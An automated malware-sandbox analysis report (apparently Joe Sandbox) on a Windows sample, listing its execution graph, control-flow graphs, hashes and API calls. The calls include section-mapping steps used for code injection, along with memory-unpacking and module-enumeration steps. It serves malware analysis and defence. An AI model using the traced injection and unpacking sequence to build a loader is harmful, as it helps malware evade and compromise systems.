                                                                        Total number of Limit Nodes:5
                                                                        execution_graph 3646 402e20 3647 402e24 3646->3647 3648 402dd5 3646->3648 3649 4019e3 15 API calls 3647->3649 3650 403029 3647->3650 3649->3650 3651 401620 3652 401626 3651->3652 3653 4016c6 NtDuplicateObject 3652->3653 3662 4017e2 3652->3662 3654 4016e3 NtCreateSection 3653->3654 3653->3662 3655 401763 NtCreateSection 3654->3655 3656 401709 NtMapViewOfSection 3654->3656 3658 40178f 3655->3658 3655->3662 3656->3655 3657 40172c NtMapViewOfSection 3656->3657 3657->3655 3659 40174a 3657->3659 3660 401799 NtMapViewOfSection 3658->3660 3658->3662 3659->3655 3661 4017c0 NtMapViewOfSection 3660->3661 3660->3662 3661->3662 3544 2de003c 3545 2de0049 3544->3545 3557 2de0e0f SetErrorMode SetErrorMode 3545->3557 3550 2de0265 3551 2de02ce VirtualProtect 3550->3551 3553 2de030b 3551->3553 3552 2de0439 VirtualFree 3556 2de04be LoadLibraryA 3552->3556 3553->3552 3555 2de08c7 3556->3555 3558 2de0223 3557->3558 3559 2de0d90 3558->3559 3560 2de0dad 3559->3560 3561 2de0dbb GetPEB 3560->3561 3562 2de0238 VirtualAlloc 3560->3562 3561->3562 3562->3550 3563 2e31900 3564 2e3190f 3563->3564 3567 2e320a0 3564->3567 3573 2e320bb 3567->3573 3568 2e320c4 CreateToolhelp32Snapshot 3569 2e320e0 Module32First 3568->3569 3568->3573 3570 2e31918 3569->3570 3571 2e320ef 3569->3571 3574 2e31d5f 3571->3574 3573->3568 3573->3569 3575 2e31d8a 3574->3575 3576 2e31d9b VirtualAlloc 3575->3576 3577 2e31dd3 3575->3577 3576->3577 3632 401a09 3633 401a0e 3632->3633 3634 401a2b Sleep 3633->3634 3635 401524 7 API calls 3634->3635 3636 401a46 3635->3636 3637 401615 7 API calls 3636->3637 3638 401a53 3636->3638 3637->3638 3717 4019ee 3718 4019f8 3717->3718 3719 401a2b Sleep 3718->3719 3723 401a53 3718->3723 3720 401524 7 API calls 3719->3720 3721 401a46 3720->3721 3722 401615 7 API calls 3721->3722 3721->3723 3722->3723 3713 402f74 3714 402f7e 3713->3714 3715 4019e3 15 API calls 3714->3715 3716 403029 3714->3716 3715->3716 3687 2de0005 3692 2de092b GetPEB 3687->3692 3689 2de0030 3694 2de003c 3689->3694 3693 2de0972 3692->3693 3693->3689 3695 2de0049 3694->3695 3696 2de0e0f 2 API calls 3695->3696 3697 2de0223 3696->3697 3698 2de0d90 GetPEB 3697->3698 3699 2de0238 VirtualAlloc 3698->3699 3700 2de0265 3699->3700 3701 2de02ce VirtualProtect 3700->3701 3703 2de030b 3701->3703 3702 2de0439 VirtualFree 3706 2de04be LoadLibraryA 3702->3706 3703->3702 3705 2de08c7 3706->3705 3578 402f9c 3579 402f8f 3578->3579 3581 403029 3579->3581 3582 4019e3 3579->3582 3584 4019f3 3582->3584 3583 401a53 3583->3581 3584->3583 3585 401a2b Sleep 3584->3585 3589 401524 3585->3589 3587 401a46 3587->3583 3601 401615 3587->3601 3590 401533 3589->3590 3590->3587 3591 4016c6 NtDuplicateObject 3590->3591 3600 4017e2 3590->3600 3592 4016e3 NtCreateSection 3591->3592 3591->3600 3593 401763 NtCreateSection 3592->3593 3594 401709 NtMapViewOfSection 3592->3594 3596 40178f 3593->3596 3593->3600 3594->3593 3595 40172c NtMapViewOfSection 3594->3595 3595->3593 3597 40174a 3595->3597 3598 401799 NtMapViewOfSection 3596->3598 3596->3600 3597->3593 3599 4017c0 NtMapViewOfSection 3598->3599 3598->3600 3599->3600 3600->3587 3602 401626 3601->3602 3603 4016c6 NtDuplicateObject 3602->3603 3612 4017e2 3602->3612 3604 4016e3 NtCreateSection 3603->3604 3603->3612 3605 401763 NtCreateSection 3604->3605 3606 401709 NtMapViewOfSection 3604->3606 3608 40178f 3605->3608 3605->3612 3606->3605 3607 40172c NtMapViewOfSection 3606->3607 3607->3605 3609 40174a 3607->3609 3610 401799 NtMapViewOfSection 3608->3610 3608->3612 3609->3605 3611 4017c0 NtMapViewOfSection 3610->3611 3610->3612 3611->3612 3612->3583 3707 2de0001 3708 2de0005 3707->3708 3709 2de092b GetPEB 3708->3709 3710 2de0030 3709->3710 3711 2de003c 7 API calls 3710->3711 3712 2de0038 3711->3712

                                                                        Executed Functions

                                                                        Function 00401524 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 401524-401556 92 401563-40156c call 4012a9 85->92 97 401593-40159b 92->97 98 40156e-401580 92->98 101 40159d-4015a0 97->101 99 401582-401589 98->99 100 4015fd-401612 98->100 103 401560 99->103 104 40158b-40158d 99->104 102 401639-40165a 100->102 105 4015a2-4015a4 101->105 106 4015e9-4015ef 101->106 114 40165d-401670 call 4012a9 102->114 115 40164e-401656 102->115 103->92 108 401590-401592 104->108 109 4015a6-4015c7 105->109 110 4015f7 105->110 106->110 108->97 112 401643 109->112 113 4015c9 109->113 110->100 112->102 113->108 116 4015cb 113->116 120 401672 114->120 121 401675-40167a 114->121 115->114 116->101 118 4015cd 116->118 118->106 120->121 123 401680-401691 121->123 124 401991-401999 121->124 127 401697-4016c0 123->127 128 40198f-4019e0 call 4012a9 123->128 124->121 127->128 136 4016c6-4016dd NtDuplicateObject 127->136 136->128 137 4016e3-401707 NtCreateSection 136->137 139 401763-401789 NtCreateSection 137->139 140 401709-40172a NtMapViewOfSection 137->140 139->128 143 40178f-401793 139->143 140->139 142 40172c-401748 NtMapViewOfSection 140->142 142->139 145 40174a-401760 142->145 143->128 146 401799-4017ba NtMapViewOfSection 143->146 145->139 146->128 149 4017c0-4017dc NtMapViewOfSection 146->149 149->128 152 4017e2 call 4017e7 149->152
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                                        • Instruction ID: 3423bc01ac4f23736aca193bd8ce0b677c435782841011dc968e413a06447a3e
                                                                        • Opcode Fuzzy Hash: ec0589a186aaf54ab9e34ef1409c0e3bd6669b76e0db207e0b32d8ee79fde39b
                                                                        • Instruction Fuzzy Hash: 4781CFB1500208BFDB209FA1DC89FABBFB8FF85710F10002AF952BA1E0D6759945CB65
                                                                        Function 00401615 Relevance: 10.7, APIs: 7, Instructions: 204nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 155 401615-40165a 163 40165d-401670 call 4012a9 155->163 164 40164e-401656 155->164 167 401672 163->167 168 401675-40167a 163->168 164->163 167->168 170 401680-401691 168->170 171 401991-401999 168->171 174 401697-4016c0 170->174 175 40198f-4019e0 call 4012a9 170->175 171->168 174->175 183 4016c6-4016dd NtDuplicateObject 174->183 183->175 184 4016e3-401707 NtCreateSection 183->184 186 401763-401789 NtCreateSection 184->186 187 401709-40172a NtMapViewOfSection 184->187 186->175 190 40178f-401793 186->190 187->186 189 40172c-401748 NtMapViewOfSection 187->189 189->186 192 40174a-401760 189->192 190->175 193 401799-4017ba NtMapViewOfSection 190->193 192->186 193->175 196 4017c0-4017dc NtMapViewOfSection 193->196 196->175 199 4017e2 call 4017e7 196->199
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                        • Instruction ID: a4a30113af8e0dba67415144994249baddb0a1b9eea12a3ecfbdd2b7a77b6b5b
                                                                        • Opcode Fuzzy Hash: 51aea8e4bab5c1fcf6e4467ccf11cb59c1a8cda3da8b4103b7978e3a0cf5edd1
                                                                        • Instruction Fuzzy Hash: B16160B0A04204FBEB209F95CC59FAFBBB9FF85700F14012AF912BA1E4D6759941CB65
                                                                        Function 00401635 Relevance: 10.7, APIs: 7, Instructions: 178nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 202 401635-40165a 206 40165d-401670 call 4012a9 202->206 207 40164e-401656 202->207 210 401672 206->210 211 401675-40167a 206->211 207->206 210->211 213 401680-401691 211->213 214 401991-401999 211->214 217 401697-4016c0 213->217 218 40198f-4019e0 call 4012a9 213->218 214->211 217->218 226 4016c6-4016dd NtDuplicateObject 217->226 226->218 227 4016e3-401707 NtCreateSection 226->227 229 401763-401789 NtCreateSection 227->229 230 401709-40172a NtMapViewOfSection 227->230 229->218 233 40178f-401793 229->233 230->229 232 40172c-401748 NtMapViewOfSection 230->232 232->229 235 40174a-401760 232->235 233->218 236 401799-4017ba NtMapViewOfSection 233->236 235->229 236->218 239 4017c0-4017dc NtMapViewOfSection 236->239 239->218 242 4017e2 call 4017e7 239->242
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                        • String ID:
                                                                        • API String ID: 1652636561-0
                                                                        • Opcode ID: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                        • Instruction ID: 3fb00a2a449b0bf69def1bd66bbf1e23b36e7d6b3741b7ef4c3438294d77159f
                                                                        • Opcode Fuzzy Hash: 65273b328aa836d1c8ef135f831071b3c0bd7089d9bb5908dabae89f1d3e14fc
                                                                        • Instruction Fuzzy Hash: 48514BB1900245BFEB208F91CC49FABBBB9FF85B10F140169F911BA2E5D6759941CB24
                                                                        Function 0040162D Relevance: 10.7, APIs: 7, Instructions: 174nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 245 40162d-40165a 251 40165d-401670 call 4012a9 245->251 252 40164e-401656 245->252 255 401672 251->255 256 401675-40167a 251->256 252->251 255->256 258 401680-401691 256->258 259 401991-401999 256->259 262 401697-4016c0 258->262 263 40198f-4019e0 call 4012a9 258->263 259->256 262->263 271 4016c6-4016dd NtDuplicateObject 262->271 271->263 272 4016e3-401707 NtCreateSection 271->272 274 401763-401789 NtCreateSection 272->274 275 401709-40172a NtMapViewOfSection 272->275 274->263 278 40178f-401793 274->278 275->274 277 40172c-401748 NtMapViewOfSection 275->277 277->274 280 40174a-401760 277->280 278->263 281 401799-4017ba NtMapViewOfSection 278->281 280->274 281->263 284 4017c0-4017dc NtMapViewOfSection 281->284 284->263 287 4017e2 call 4017e7 284->287
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                        • Instruction ID: aa686160c5e479dc60cd3c6abf7d34016e244b0820b9c6a6449991f1b23776f6
                                                                        • Opcode Fuzzy Hash: 7cce7ca2c81922fdd57f436713529b55977ba2092893eab35f95f5ad939aedda
                                                                        • Instruction Fuzzy Hash: F1513BB1900209BFEB208F91CC48FAFBBB8FF85B10F140129F911BA2E5D6759945CB24
                                                                        Function 00401620 Relevance: 10.7, APIs: 7, Instructions: 173nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 290 401620-40165a 297 40165d-401670 call 4012a9 290->297 298 40164e-401656 290->298 301 401672 297->301 302 401675-40167a 297->302 298->297 301->302 304 401680-401691 302->304 305 401991-401999 302->305 308 401697-4016c0 304->308 309 40198f-4019e0 call 4012a9 304->309 305->302 308->309 317 4016c6-4016dd NtDuplicateObject 308->317 317->309 318 4016e3-401707 NtCreateSection 317->318 320 401763-401789 NtCreateSection 318->320 321 401709-40172a NtMapViewOfSection 318->321 320->309 324 40178f-401793 320->324 321->320 323 40172c-401748 NtMapViewOfSection 321->323 323->320 326 40174a-401760 323->326 324->309 327 401799-4017ba NtMapViewOfSection 324->327 326->320 327->309 330 4017c0-4017dc NtMapViewOfSection 327->330 330->309 333 4017e2 call 4017e7 330->333
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                        • Instruction ID: 248f23169df6d57de1173162bb8fcbefd5e68f0f1e7bb912041edb2cf68793e3
                                                                        • Opcode Fuzzy Hash: 12b8ac929dc161cd787772d3b0c17c9a63962b5a64d089a0a0b4311b045f45cc
                                                                        • Instruction Fuzzy Hash: 11512AB0900245BFEB208F91CC48FAFBBB8FF85B00F14016AF911BA2E5D6759941CB24
                                                                        Function 00401658 Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 336 401658-401670 call 4012a9 340 401672 336->340 341 401675-40167a 336->341 340->341 343 401680-401691 341->343 344 401991-401999 341->344 347 401697-4016c0 343->347 348 40198f-4019e0 call 4012a9 343->348 344->341 347->348 356 4016c6-4016dd NtDuplicateObject 347->356 356->348 357 4016e3-401707 NtCreateSection 356->357 359 401763-401789 NtCreateSection 357->359 360 401709-40172a NtMapViewOfSection 357->360 359->348 363 40178f-401793 359->363 360->359 362 40172c-401748 NtMapViewOfSection 360->362 362->359 365 40174a-401760 362->365 363->348 366 401799-4017ba NtMapViewOfSection 363->366 365->359 366->348 369 4017c0-4017dc NtMapViewOfSection 366->369 369->348 372 4017e2 call 4017e7 369->372
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                        • Instruction ID: 4b61e56e2161a851a120027933825f601e9725a76b72e0f731e8dd48e05b5e19
                                                                        • Opcode Fuzzy Hash: aa98929751f72b2856ef190e74a7c0d3b4de1d989d606075f79a5f41b676d3e0
                                                                        • Instruction Fuzzy Hash: FC51F7B5900249BFEF209F91CC88FAFBBB9FF85B10F100159F911AA2A5D6749944CB24
                                                                        Function 02E320A0 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 375 2e320a0-2e320b9 376 2e320bb-2e320bd 375->376 377 2e320c4-2e320d0 CreateToolhelp32Snapshot 376->377 378 2e320bf 376->378 379 2e320d2-2e320d8 377->379 380 2e320e0-2e320ed Module32First 377->380 378->377 379->380 387 2e320da-2e320de 379->387 381 2e320f6-2e320fe 380->381 382 2e320ef-2e320f0 call 2e31d5f 380->382 385 2e320f5 382->385 385->381 387->376 387->380
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02E320C8
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 02E320E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740824715.0000000002E2B000.00000040.00000020.00020000.00000000.sdmp, Offset: 02E2B000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2e2b000_2.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: c85eaf569ff39ee78dbebcb1678ef9fdc7ad53b8203138eabb5fdca1116639dc
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: A7F0C2311407106BD7312AF59C8CB6F72E9AF4926AF109128EB86950C0CB70EC49CA61
                                                                        Function 02DE003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 2de003c-2de0047 1 2de004c-2de0263 call 2de0a3f call 2de0e0f call 2de0d90 VirtualAlloc 0->1 2 2de0049 0->2 17 2de028b-2de0292 1->17 18 2de0265-2de0289 call 2de0a69 1->18 2->1 19 2de02a1-2de02b0 17->19 21 2de02ce-2de03c2 VirtualProtect call 2de0cce call 2de0ce7 18->21 19->21 22 2de02b2-2de02cc 19->22 29 2de03d1-2de03e0 21->29 22->19 30 2de0439-2de04b8 VirtualFree 29->30 31 2de03e2-2de0437 call 2de0ce7 29->31 33 2de04be-2de04cd 30->33 34 2de05f4-2de05fe 30->34 31->29 35 2de04d3-2de04dd 33->35 36 2de077f-2de0789 34->36 37 2de0604-2de060d 34->37 35->34 39 2de04e3-2de0505 35->39 40 2de078b-2de07a3 36->40 41 2de07a6-2de07b0 36->41 37->36 42 2de0613-2de0637 37->42 51 2de0517-2de0520 39->51 52 2de0507-2de0515 39->52 40->41 44 2de086e-2de08be LoadLibraryA 41->44 45 2de07b6-2de07cb 41->45 46 2de063e-2de0648 42->46 50 2de08c7-2de08f9 44->50 48 2de07d2-2de07d5 45->48 46->36 49 2de064e-2de065a 46->49 53 2de07d7-2de07e0 48->53 54 2de0824-2de0833 48->54 49->36 55 2de0660-2de066a 49->55 56 2de08fb-2de0901 50->56 57 2de0902-2de091d 50->57 58 2de0526-2de0547 51->58 52->58 59 2de07e4-2de0822 53->59 60 2de07e2 53->60 62 2de0839-2de083c 54->62 61 2de067a-2de0689 55->61 56->57 63 2de054d-2de0550 58->63 59->48 60->54 64 2de068f-2de06b2 61->64 65 2de0750-2de077a 61->65 62->44 66 2de083e-2de0847 62->66 68 2de0556-2de056b 63->68 69 2de05e0-2de05ef 63->69 70 2de06ef-2de06fc 64->70 71 2de06b4-2de06ed 64->71 65->46 72 2de084b-2de086c 66->72 73 2de0849 66->73 74 2de056f-2de057a 68->74 75 2de056d 68->75 69->35 76 2de06fe-2de0748 70->76 77 2de074b 70->77 71->70 72->62 73->44 79 2de057c-2de0599 74->79 80 2de059b-2de05bb 74->80 75->69 76->77 77->61 84 2de05bd-2de05db 79->84 80->84 84->63
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02DE024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740688964.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2de0000_2.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 18aa183273b5f6f9607d16aaeab441365940d8a99b46a2781a1a081a15357831
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: D0526874A002299FDB64DF58C984BACBBB1BF09305F1480D9E94EAB351DB70AE85CF14
                                                                        Function 02DE0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 388 2de0e0f-2de0e24 SetErrorMode * 2 389 2de0e2b-2de0e2c 388->389 390 2de0e26 388->390 390->389
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02DE0223,?,?), ref: 02DE0E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02DE0223,?,?), ref: 02DE0E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740688964.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DE0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2de0000_2.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: 4750618981923a01f89273afc3a4e037d58370ce1d0f83cbcc8ad4e0bd2a7547
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: AFD0123114512877DB003A94DC09BCD7B1CDF05B67F008021FB0DE9180C7B0994086E5
                                                                        Function 00401A01 Relevance: 1.3, APIs: 1, Instructions: 90sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 391 401a01-401a02 392 401a04-401a05 391->392 393 401a60 392->393 394 401a06-401a48 call 4012a9 Sleep call 401524 392->394 395 401a62 393->395 396 4019f8-401a0b 393->396 402 401a57-401a6f 394->402 425 401a4a-401a52 call 401615 394->425 399 401a53 395->399 400 401a64 395->400 396->392 399->402 404 401a66-401a6b 400->404 405 401ace-401b1c call 4012a9 400->405 409 401a72-401aa7 call 4012a9 402->409 420 401a65-401a6b 402->420 404->409 433 401b21 405->433 420->409 425->399 433->433
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDuplicateObjectSectionSleep
                                                                        • String ID:
                                                                        • API String ID: 4152845823-0
                                                                        • Opcode ID: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                        • Instruction ID: 81c5b6d8da752c85ef5c48e217346158da0f95f2e0f30d6723e854e1366495a5
                                                                        • Opcode Fuzzy Hash: a2a9be82b00004be15cf4a85e345d814439cc040836b0b3e383e57413077d33c
                                                                        • Instruction Fuzzy Hash: AE21383234E201EBDB009B90AD419BA3315AB85714F34467BF5137A1F2C63E99436F6B
                                                                        Function 004019E3 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 434 4019e3-4019fc 436 4019f3 434->436 437 4019ff-401a0b 434->437 439 4019f8 436->439 441 401a60 437->441 442 401a06-401a48 call 4012a9 Sleep call 401524 437->442 439->437 441->439 443 401a62 441->443 448 401a57-401a6f 442->448 470 401a4a-401a52 call 401615 442->470 445 401a53 443->445 446 401a64 443->446 445->448 449 401a66-401a6b 446->449 450 401ace-401b1c call 4012a9 446->450 454 401a72-401aa7 call 4012a9 448->454 465 401a65-401a6b 448->465 449->454 478 401b21 450->478 465->454 470->445 478->478
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                          • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                          • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1739496028.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_2.jbxd
                                                                        Similarity
